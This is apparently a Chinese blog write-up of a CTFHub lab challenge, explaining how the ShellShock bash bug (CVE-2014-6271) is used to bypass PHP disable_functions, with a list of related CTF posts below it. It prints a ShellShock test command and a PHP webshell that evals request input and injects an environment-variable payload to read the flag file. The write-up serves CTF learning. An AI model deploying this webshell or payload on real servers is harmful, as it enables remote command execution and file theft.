CTFHub ShellShock解题记录

最新推荐文章于 2024-04-26 13:53:30 发布
最新推荐文章于 2024-04-26 13:53:30 发布
阅读量1.7k 收藏 4
点赞数 2
分类专栏: WriteUp 文章标签: php shell linux 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44732566/article/details/105358606
版权

CTFHub Bypass disable_function ShellShock

ShellShock,破壳漏洞,出现于2014年
可以通过以下命令来判断是否存在这个漏洞

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

如果结果中有 vulnerable说明存在这个漏洞,执行了echo vulnerable这个语句。
大致原理:
bash shell中定义环境变量通过函数名称来调用时,正常情况下是这样
在这里插入图片描述
但是对于存在shellshock漏洞的环境下,Bash对于环境变量只是检测到函数,并且从’{‘开始执行,但是并没有在’}'后停止,也就是说定义在函数体外shell命令也会执行,所以env x='() { :;}; echo vulnerable' 输出了vulnerable。

题目打开,通过蚁剑连接在这里插入图片描述查看phpinfo() 和上题一样还是没有禁用error_log函数。正常情况下蚁剑已经实现通过ShellShock漏洞,直接拿到shell,但是这题不行。在这里插入图片描述得手工,上传shell.php和test.php,用来存放命令执行结果
可能是因为test.php文件为空上传报错,但是还是传上去了,刷新一下,
在这里插入图片描述

<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

发现在/目录有flag文件,和之前LD_PRELOAD题目一样,这次直接通过tac来读取文件。
通过putenv来设置环境变量,默认putenv定义的环境变量名必须以PHP_开头。
error_log()函数会在执行sh -c -t -i触发payload
在这里插入图片描述
在浏览器访问shell.php,再打开tes,php,拿到flag在这里插入图片描述搞定

参考文章

wind lin
关注
专栏目录
Ctfhub解题 web RCE
weixin_46703850的博客
03-20 992
Ctfhub解题 web RCE
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5504
Ctfhub解题 web SQL注入
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1378
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
CTFHub 目录便利 解题思路
曹振国的博客
05-02 421
目录遍历一、目录遍历是什么?二、进入环境2.打开页面,挨个访问3.flag 一、目录遍历是什么? 目录遍历(路径遍历)是由于web服务器配置错误,或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件,甚至执行系统命令。 二、进入环境 2.打开页面,挨个访问 3.flag ...
Ctfhub解题 web 信息泄露
weixin_46703850的博客
03-14 681
记录解题过程
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
shellshockcgitool:CGI脚本Shellshock开发工具
03-08
CGI脚本ShellShock开发工具。 什么是ShellshockShellshock是Bash版本1.0.3-4.3中的关键错误,可以使攻击者执行任意命令。 Bash的漏洞版本错误地执行了遵循存储在环境变量中的函数定义的命令-攻击者可以在将用户...
漏洞分析Shellshock Attack Lab(自用,记录)
weixin_48392428的博客
07-05 1245
Shellshock Attack Lab1. Overview2. Lab TasksTask 1: Attack CGI programsTask 2ATask 2BTask 2CTask3 问题 1. Overview 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样他们才能了解Shellshock 的脆弱性。学习本实验室的目的是让学生对这种有趣的攻击有第一
shellshocker:ShellShock Live游戏的程序,用于计算击中敌人所需的角度和强度
05-12
Shellshocker是一款基于C++开发的游戏程序,名为"ShellShock Live",它涉及到计算机编程、游戏开发和物理学的结合。这款游戏的核心玩法是计算并发射炮弹以击中敌人,这需要玩家理解角度和力度的概念,这在物理中是...
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTFhub技能书解题笔记-Cookie
qq_43006864的博客
12-09 1512
一:打开题目,主页给出的提示是,仅仅只有admin用户,才能看到flag 二、这里我们还是打开burpsuit,抓包看一下数据包。通过对该页面进行抓包,发现了cookie位置的值为:admin=0。那么可以理解为现在是因为admin=0,所以我们非admin用户,就无法看倒flag。 这里因为0和1通常用来表示“否”和“是”,所以这里我们将0改为1。 得到flag ...
CTFHub技能书解题笔记-文件上传-文件头检查
qq_43006864的博客
01-07 1007
打开题目 到这里看起来没啥异样,上传个马子试试。 看起来过滤了一些东西啊。这里继续上传马子 看来也检测内容了。 只允许上传图片格式,那做个图片马试试。 这里图片马的指令: win:copy xxx.jpg/b + xxx.php 图片马.php /b 表示以二进制方式打开 /a 表示以ASCII方式打 这里我生成的事php的马子,是因为本道题死一到后端过滤的。 后端过滤我们需要把文件格式也改为JPG之类的。 成功 上传完毕shell连接成功。 ...
动态加载器的知识学习及CTFHUB动态加载器解题
hapenl的博客
10-21 1421
本文介绍了Linux动态库加载器的基本知识,介绍了ELF文件的查看指令以及执行文件的执行链路的查看,最后通过可执行的动态加载库来绕过没有执行权限的执行文件
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 7052
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
off-by-one,CTFHub例题
saulgoodman的博客
01-30 160
【代码】off-by-one,CTFHub例题。
CTFHub ShellShock wp(详解)
m0_73195494的博客
03-03 962
个人理解:当一个环境变量以"() {"开头时,bash会将该环境变量解析为函数进行执行什么是ShellShock攻击?验证是否存在ShellShock漏洞(漏洞存在于之前的版本。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
最新发布
2401_84252281的博客
04-26 999
任务环境说明:服务器场景:Server1。
CTFhub备份文件下载四题做题方法
qq_65083200的博客
04-18 610
目录 网站源码 back文件 vim缓存 .DS_Store 网站源码 做网站源码首先下载Burp Suite软件,用于文件抓包|;百度搜索“burp”即可下载。 下载安装好了Burp Suite软件后,开始解题: 1、打开CTFhub备份文件下的网站源码开启环境,点击进入题目 2、打开Burp Suite在proxy下intercept 窗口点击intercept is on 再点击opep browser,在打开的网页中输入题目的网址,回车可以看到窗口的变化,“..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值